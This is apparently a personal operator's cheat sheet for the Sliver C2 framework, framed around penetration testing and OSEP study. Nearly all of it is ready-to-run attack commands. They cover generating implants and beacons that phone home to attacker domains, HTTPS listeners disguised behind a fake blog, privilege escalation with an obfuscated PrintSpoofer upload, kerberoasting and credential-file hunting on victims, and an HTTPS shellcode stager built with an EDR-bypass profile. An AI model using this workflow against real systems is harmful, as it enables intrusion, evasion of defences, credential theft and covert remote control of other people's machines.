# Sliver Sliver's a rad C2 ## Resources that help me make sense of Sliver * [Tutorial: Create a MacroPack Pro Sliver stager with AV bypass](https://www.youtube.com/watch?v=2u74Ig8cUVY) * [Passing the OSEP exam using Sliver](https://bishopfox.com/blog/passing-the-osep-exam-using-sliver) * [Tutorial: Sliver C2 with BallisKit MacroPack and ShellcodePack](https://blog.balliskit.com/tutorial-sliver-c2-with-balliskit-macropack-and-shellcodepack-452e94c24b19) ## Install Sliver ### Linux one-liner ``` curl https://sliver.sh/install|sudo bash ```` With dependencies (if not already installed): ``` sudo apt install mingw-w64 ``` ### With single binary ``` cd ~/ wget https://github.com/BishopFox/sliver/releases/download/v1.5.43/sliver-server_linux chmod +x sliver-server_linux ``` ### Install certbot (optional - for if you want to integrate with LetsEncrypt) ``` sudo apt install certbot -y sudo certbot certonly # I like this method because I port-forward 80/443 to my internal host, then choose option 1 (temporary Web server) and then fill out the rest of the fields to generate my cert # # Copy the key files to the home folder to make them easier to access later: # # sudo cp /etc/letsencrypt/live/domain.com/fullchain.pem ~/ # sudo cp /etc/letsencrypt/live/domain.com/privkey.pem ~/ # # Adjust permissions so your basic "kali" or whatever user can see these files: # sudo chown sevminsec:sevminsec /home/sevminsec/privkey.pem /home/sevminsec/fullchain.pem # sudo chmod 640 privkey.pem fullchain.pem ``` ## Run Sliver ``` sudo ./sliver-server_linux ``` ## Install the armory (At a sliver shell) ``` armory install all ``` ### Armory "must haves" **Certify** ``` # Install it armory install certify # Basic run certify -- find /vulnerable ``` **Rubeus** ``` # Install it armory install rubeus # Find Kerberoastable users rubeus -- kerberoast /nowrap ``` **Seatbelt** ``` # Install it armory install seatbelt # Useful checks seatbelt -- DotNet seatbelt -- Antivirus seatbelt -- WindowsDefender seatbelt -- LocalUsers seatbelt -- LogonSessions seatbelt -- CredentialFiles seatbelt -- ChromiumPresence seatbelt -- KeePassPresence seatbelt -- TokenPrivileges seatbelt -- PowerShellHistory seatbelt -- ProcessCreationEvents seatbelt -- NetworkShares seatbelt -- ScheduledTasks seatbelt -- Services seatbelt -- UAC # Interesting files seatbelt -- InterestingFiles seatbelt -- InterestingProcesses # Save output to file seatbelt --save -- -group=all ``` **Sharphound** ``` # Install it armory install sharp-hound-4 # Basic collection - will create a file called something like 20260311170832_filename.zip sharp-hound-4 -s -t 300 -- -c all --zipfilename filename ``` ## IMPLANTS ### Generate a general mtls implant ``` generate --mtls domain.dom:8888 --format shellcode --arch amd64 --skip-symbols --save splinter.bin --name ETPHONEHOME ``` ### Generate a general HTTPS implant ``` generate --http https://10.7.10.253:8090 --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME ``` ### Generate an HTTPS implant with a custom domain ``` generate --http yourdomain.ru --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME ``` ### Delete an implant ``` implants rm NAME-OF-IMPLANT ```` !!!tip You might also have to delete disk-level remnants. For example if you previously made an implant called *ETPHONEHOME* and then try to make another one, Sliver might complain like this: ``` [*] Generating new windows/amd64 implant binary [!] Symbol obfuscation is disabled [!] rpc error: code = Internal desc = rename import dir: target exists: /root/.sliver/slivers/windows/amd64/etphonehome/src/runc/cgroup ``` In which case you can nuke from disk (at regular command prompt) with: ``` sudo rm -rf /root/.sliver/slivers/windows/amd64/etphonehome ``` !!! ## Start a general listener ``` https --lhost 10.7.10.253 --lport 8090 ``` ### Start a listener with a custom domain ``` https --domain example.com ``` ## Generate a fake Web site to go along with your HTTPS listener First make a `~/www` folder, and then: ``` websites add-content --website fake-blog --web-path / --content www/index.html ``` *Note: the `fake-blog` name will be referenced below if you setup an HTTPS listener with a custom domain and specific fake content*. ### Starting an HTTPs listener with a custom domain WITH pre-generated LetsEncrypt cert AND static content on your fake site ``` https --domain yourdomain.net.ru.edu.lol --cert ./fullchain.pem --key ./privkey.pem --website fake-blog ``` ## Establishing sessions with victim machines From the victim system, find a way to run your `beacon.exe`. It will "phone home" to Sliver C2. To "upgrade" to a higher-privilege shell, upload an obfuscated `printspoofer.exe`: ``` use xxx (the session that was spawned) upload /home/youruser/notprintspoofer.exe c:\\users\\public\\nps.exe ``` Then run it: ``` execute c:\\users\\public\\nps.exe -c c:\\users\\public\\your-original-beacon.exe ``` ## Interacting with sessions ### Run BloodHound ``` sharp-hound-4 -- 'c all' --outputdirectory 'c:\users\public' ``` !!!tip Specify `--outputdirectory` because what I've found is by default it tries to write to `c:\windows\system` which will be problematic if you're not a full local admin. Plus I don't want to clutter that directory up with a bunch of garbage. !!! Find and download it: ``` ls *.zip download 2025blahblah.zip ``` ## Kill all dead sessions (marked as [DEAD]) ``` sessions -C ``` ## BEACONS ### Generate one with custom domain ``` generate beacon --http yourdomain.ru --format exe --arch amd64 --disable-sgn --skip-symbols --save splinter.exe --name BEECONE ``` ### Check beacon status ``` beacons ``` ### Watch beacons continuously for check in ``` beacons watch ``` ### Adjust check-in time of the beacon ``` use xxx # Reconfigure callback time to 200s with an 11s jitter reconfigure -i 200s -j 11s ``` ### Check pending tasks ``` tasks ``` ## PROFILES *Under construction* ### Generate profile ``` profiles new beacon --http domain.com --format shellcode --disable-sgn --skip-symbols bee ``` ### Add fake blog ``` websites add-content --website fake-blog --web-path / --content www/index.html ``` ### Stand up domain with HTTPS ``` https --domain domain.com --cert ./fullchain.pem --key ./privkey.pem --website fake-blog ``` ### Stage a listener ``` stage-listener --url https://yourdomain.com:8080 --profile bee ``` ### Generate the profile ``` profiles generate bee ``` ### Setup a staged payload with shellcodepack ``` echo "https://domain.com:8080/name-doesnt-matter.woff" | shellcode_pack.exe -t HTTPS_STAGER -G preloads\yourshellcode.bin --bypass-profile .\bypass_profiles\edrbypass.json ```` ## Start/restart sliver ``` sudo systemctl start sliver ``` ## Sliver quick reference for system interaction Find basic info about the session: ``` [localhost] sliver (etphonehome) > info Session ID: a07faa10-3584-4205-88f3-e1c1ad0ff400 Name: etphonehome Hostname: dc-vil UUID: cb7bb9dd-833f-4521-9614-dab4560d794d Username: NINJA\localuser UID: S-1-5-21-11790880-2535113846-25489808-1000 GID: S-1-5-21-11790880-2535113846-25489808-513 PID: 2984 OS: windows Version: Server 2016 build 17763 x86_64 Locale: en-US Arch: amd64 Active C2: https://domain.domain Remote Address: 1.2.3.4:50737 Proxy URL: Reconnect Interval: 1m0s First Contact: Wed Mar 11 22:04:17 UTC 2026 (8m31s ago) Last Checkin: Wed Mar 11 22:12:47 UTC 2026 (1s ago) ``` Logged on user: ``` sa-whoami sa-netloggedon ``` ## Quick reference (for me to quickly get up and running with a custom domain with HTTPS listener and obfuscated payload) ``` # generate the thing generate --http custom.domain --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME # start listening https --domain custom.domain ```